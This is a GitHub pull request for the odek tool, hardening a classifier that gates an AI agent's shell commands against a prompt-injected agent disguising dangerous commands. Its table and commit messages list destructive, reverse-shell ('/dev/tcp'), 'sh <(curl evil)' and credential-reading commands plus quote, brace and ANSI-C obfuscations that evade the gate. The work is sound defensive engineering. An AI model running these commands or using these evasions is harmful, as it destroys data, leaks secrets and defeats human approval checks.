harden(danger): close classifier evasion vectors + fail closed on unknown commands by jkyberneees · Pull Request #5 · BackendStack21/odek

jkyberneees · 2026-06-03T10:37:37Z

Why

The danger classifier is the approval gate's first line of defense. It must assume a prompt-injected agent is actively trying to disguise a dangerous command as harmless so it runs without a prompt. A deep review found several bypasses and a structural weakness: the gate failed open (anything unrecognized → Safe → allow). This PR closes the bypasses and flips the default to fail-closed.

Part 1 — Evasion vectors closed

Vector	Example	Before → After
Quote-split verb	`r""m -rf /`	safe → destructive
Pipe stage ignored	`true \| dd of=/dev/sda`	safe → destructive
Pipe stage ignored	`echo x \| sudo rm -rf /home/u`	safe → destructive
Exec wrapper masks verb	`env rm -rf /etc`, `xargs rm -rf /etc`	safe → destructive
sudo masks inner verb	`sudo rm -rf /var/log`	system_write → destructive
Shell `-c` payload	`bash -c 'rm -rf /'`	safe → destructive
Reverse shell	`bash -i >& /dev/tcp/h/p`	safe → network_egress
Sensitive read	`cat ~/.ssh/id_rsa`, `cat /proc/self/environ`	safe → system_write
Relative wipe	`rm -rf ~`, `rm -rf *`, `rm -rfv /etc`	local_write → destructive
Brace / ANSI-C	`{rm,-rf,/}`, `$'\x72\x6d' -rf /`	safe → destructive
Process subst into shell	`sh <(curl evil)`	network → code_execution
New tools	`socat`, `dig`, `npx`, `pnpm dlx`, `find … -exec`, `source`	safe → network/code_execution

Layers: tokenizer (quote boundaries are not word boundaries) · per-pipe-stage classification · wrapper unwrapping (env/xargs/sudo/… ) · verb-independent resource scan (/dev/tcp, sensitive paths) · payload re-classification (bash -c, <(…)) · ANSI-C + brace normalization · broadened rm/dd/network/exec/install detection.

Part 2 — Fail closed on unknown commands

Previously a command whose verb matched no check fell through to Safe (allow). Now:

New Unknown risk class, default action Deny (same as Destructive), ranked just below destructive so one unknown stage dominates benign siblings (pip install x && weirdverb → deny).
safeCommands — an explicit read-only/no-op allowlist (ls, cat, grep, sort, jq, stat, ps, benign builtins like cd/export, …) keeps ordinary inspection Safe. Mutating/code-executing tools are deliberately not here — they must be allowlisted, not slip through unclassified. A safe command with a write redirect or system/sensitive path is still escalated first.
Leading VAR=val assignments unwrapped (FOO=bar rm -rf / → rm); assignment-only is a no-op.
Side benefit: variable indirection ($X -rf /) now denies (unknown verb) instead of silently allowing.

Per-profile config: "unknown": "prompt" for a softer stance, or allowlist specific tools. Godmode (action: allow) still allows it, exactly like destructive. Note: in the default profile this means an unrecognized command (e.g. make, cargo build) is now denied unless allowlisted — that is the intended fail-closed posture.

Docs & tests

Classifier package doc rewritten: threat model, layered design, fail-closed default, and explicit limitations (variable indirection, dynamic construction, non-enumerated transforms, known-verb escape hatches). hardening_test.go pins every closed vector + the fail-closed / assignment-unwrap / safe-allowlist behavior; benign commands guarded against over-classification. Two existing expectations updated (sudo rm -rf /var/log → destructive; rank/ActionFor for the new class). Full go test ./... green; go vet clean.

🤖 Generated with Claude Code

The risk classifier is the approval gate's first line of defense, so it must assume a prompt-injected agent is actively trying to disguise a dangerous command as harmless. A review surfaced several bypasses where a destructive/exfiltrating command under-classified to safe/local_write (i.e. ran without a prompt). This closes them in layers: Tokenizer - Quote boundaries are no longer word boundaries: r""m, "rm", r''m all resolve to `rm` again (empty/adjacent quotes used to split the verb). Structural decomposition - Every pipe stage is classified, not just the head command, so `true | dd of=/dev/sda`, `: | wget … -O /tmp/x` and `echo x | sudo rm -rf /home` are seen for what their later stages do. Wrapper unwrapping - Leading exec wrappers (env, xargs, nohup, nice, setsid, timeout, …) are stripped so the real command is classified; sudo/doas/pkexec set a system_write floor and let the inner command escalate (sudo rm -rf /var → destructive, instead of being masked as system_write). Verb-independent resource scanning - /dev/tcp and /dev/udp (reverse-shell channels) → network_egress. - Reads/writes of sensitive credential paths (~/.ssh, /etc/shadow, ~/.aws/credentials, /proc/self/environ, …) → system_write. Payload re-classification & normalisation - bash/sh -c '…' payloads and <(…)/>(…) process substitutions are re-classified (a shell given anything to execute → code_execution). - New normalisation passes: ANSI-C $'\x72\x6d', brace expansion {rm,-rf,/}. Detection coverage - rm: robust recursive/force flag parsing (-rfv, -Rf, --recursive --force) and relative wipe targets (~, $HOME, *, ., ..). - dd: broadened raw block-device list (vd/hd/xvd/mmcblk/disk/loop/dm). - network: socat, rclone, dig/nslookup/host/drill, aria2c/axel/httpie. - code exec: source/., npx/bunx/uvx/pipx, pnpm|yarn dlx, uv run, find -exec. - install: pnpm/yarn/bun/apk add|install. The package doc now states the threat model, the layered design, and the explicit limitations (variable indirection, dynamic construction, non-enumerated transforms) — this is defence-in-depth, not a sandbox, so it errs toward over-classification (an extra prompt) over silent misses. One existing expectation updated: `sudo rm -rf /var/log` is now destructive (was system_write) — the more accurate, more secure class. New hardening_test.go pins each closed vector and guards benign commands against over-classification. Full suite green; go vet clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

Previously the classifier fell through to Safe (allow) for any command it didn't recognise, so the whole gate was fail-open: a novel or obfuscated verb that dodged every known-dangerous check ran unprompted. Flip it to fail-closed: - New Unknown risk class, default action Deny (same as Destructive), ranked just below Destructive so a single unknown stage dominates benign siblings in a pipeline/compound command. - classifyCommand now returns Safe only for a recognised command used benignly, and Unknown otherwise. - safeCommands: an explicit read-only/no-op allowlist (ls, cat, grep, sort, jq, stat, ps, git via existing prefixes, cd/export and other benign builtins, …) so ordinary inspection still classifies Safe. Mutating/code-executing tools are deliberately excluded — they must be allowlisted, not slip through unclassified. A safe command given a write redirect or system/sensitive path is still escalated first. - Leading VAR=val assignments are unwrapped (FOO=bar rm -rf / → rm), and an assignment-only command is a no-op (Safe). Side benefit: the variable-indirection limitation now denies rather than silently allows — `$X -rf /` reads as an Unknown verb. Configurable like any class: set "unknown": "prompt" for a softer profile, or use the allowlist for specific trusted tools. Godmode (action: allow) still allows it, exactly like Destructive. Docs and tests updated (rank/ActionFor expectations; new fail-closed, assignment-unwrap, and safe-allowlist coverage). Full suite green; vet clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

…wn class Extend the user-facing guide for setting up the "dangerous" approval policy, and bring the security/CLI/dev docs in line with the new 9-class model (adds the fail-closed `unknown` class). DOCKER_COMPOSE_USER_GUIDE.md §5a now has a full field-by-field setup guide for the restricted profile: - what each key does (sandbox/action/non_interactive/classes/allow/deny) - the 9-class table with built-in vs profile actions - the action-resolution precedence (allowlist → denylist → classes → blocked → action → built-in default → non_interactive) - a gotcha: a global "action" overrides EVERY unlisted class, so the shipped restricted profile prompts even on `safe` (`ls`) unless you add "safe": "allow" or omit "action" — both shown - customisation recipes (tighten / loosen / allowlist one tool / lockdown) CLI.md, SECURITY.md, DEVELOPMENT.md: add the `unknown` class, state the fail-closed default, refresh the evasion list and regression-suite pointers. No code changes. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

Keep all documentation under docs/. Update the in-file Reference links (docs/X.md → X.md, now siblings) and the inbound pointer from docker/README.md (../ → ../docs/). Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

Self-review of the fail-closed change surfaced consumers that enumerate risk classes but were never taught about the new Unknown class, plus two classifier correctness bugs. Fixes: 1. Sub-agent risk caps ignored Unknown (cmd/odek/subagent.go). The mirror riskRank() had no Unknown case (returned 0) and the untrusted + maxRisk clamp loops didn't list it. Result: max_risk="unknown" denied even Safe, and a capped/untrusted sub-agent never force-denied Unknown when the inherited config loosened it. Root cause was the duplicated ranking, so export danger.Rank as the single source of truth (rank→Rank) and have subagent.go use it; add danger.Unknown to both clamp loops. 2. Trust-class shortcut allowed Unknown (internal/danger/approver.go, cmd/odek/wsapprover.go). "Trust class for session" was disabled only for Destructive/Blocked, so a single grant could blanket-approve every future unrecognised verb — the exact approval-fatigue attack the exclusion exists to stop. Exclude Unknown too. 3. dd to a character device misclassified destructive (classifier.go). isDestructive's of= branch matched any "/dev/" substring, so the common `dd ... of=/dev/null` / `of=/dev/stdout` idioms were denied. Use the precise containsBlockDevice matcher (also dedupes the device logic). 4. ANSI-C octal over-read (classifier.go decodeEscape). The loop consumed up to 4 octal digits; bash takes at most 3. `$'\1551'` now decodes to "m1" (octal 155 + literal 1), matching the shell, not a single byte. Regression tests added for each; rank→Rank rename propagated through the danger package and its tests. Full suite green; go vet clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

Follow-up to the Unknown-class fixes — the lower-severity review items: 5. shell tool description (cmd/odek/shell.go): add the `unknown` class and state the fail-closed default, so the model driving the tool can reason about why an unrecognised command was denied. 6. sensitivePathFragments (classifier.go): document why it is deliberately separate from ClassifyPath's home-sensitive-dir list (token-substring, credential reads vs absolute-path write-risk) so the overlap doesn't get "deduped" into a behavior change, and so a maintainer updating one considers the other. 7. safeCommands (classifier.go): extend the read-only allowlist with common modern CLIs (fd, eza/exa/lsd, htop/btop/glances, pstree/procs, duf, dust, delta, hexyl, glow) so fail-closed doesn't deny routine inspection. 8. classifyStage (classifier.go): pass a pipedInto flag instead of having classifyPipeline re-run unwrapWrappers on each non-head stage purely to read the head command — one unwrap per stage now. 9. hasSystemRedirectTarget → touchesSystemPath (classifier.go): the function flags ANY system-path token, not just redirect targets, and is NOT redundant with isSystemWrite (verified: it catches `cat /etc/foo` and unknown tools pointed at /usr, and runs after isLocalWrite). Renamed for accuracy with a comment on why both checks exist. Behavior change is limited to #7 (more tools classify Safe). Regression test for the new safe tools added. Full suite green; go vet clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

CodeQL flagged incorrect type conversion: strconv.ParseUint was parsing into a 16-bit target (8, 16) then casting to uint8 without bounds checking. Since octal escapes in bash are always mod 256 (fit in uint8), parse directly as 8-bit (8, 8) to ensure the conversion is safe and eliminate the CodeQL warning. All tests pass including TestHardening_ANSICOctalDigitCap. Co-Authored-By: Claude Haiku 4.5 <noreply@anthropic.com>

github-advanced-security AI found potential problems Jun 3, 2026

View reviewed changes

Comment thread internal/danger/classifier.go Fixed

jkyberneees changed the title ~~harden(danger): close shell-command classifier evasion vectors~~ harden(danger): close classifier evasion vectors + fail closed on unknown commands Jun 3, 2026

jkyberneees and others added 2 commits June 3, 2026 12:59

jkyberneees force-pushed the harden/command-classifier branch from 1453a50 to 91343e3 Compare June 3, 2026 11:02

github-advanced-security AI found potential problems Jun 3, 2026

View reviewed changes

Comment thread internal/danger/classifier.go Fixed

jkyberneees and others added 2 commits June 3, 2026 13:29

jkyberneees merged commit 1469af1 into main Jun 3, 2026
6 checks passed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

harden(danger): close classifier evasion vectors + fail closed on unknown commands#5

harden(danger): close classifier evasion vectors + fail closed on unknown commands#5
jkyberneees merged 7 commits into
mainfrom
harden/command-classifier

jkyberneees commented Jun 3, 2026 •

edited

Loading

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Conversation

jkyberneees commented Jun 3, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Why

Part 1 — Evasion vectors closed

Part 2 — Fail closed on unknown commands

Docs & tests

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

jkyberneees commented Jun 3, 2026 •

edited

Loading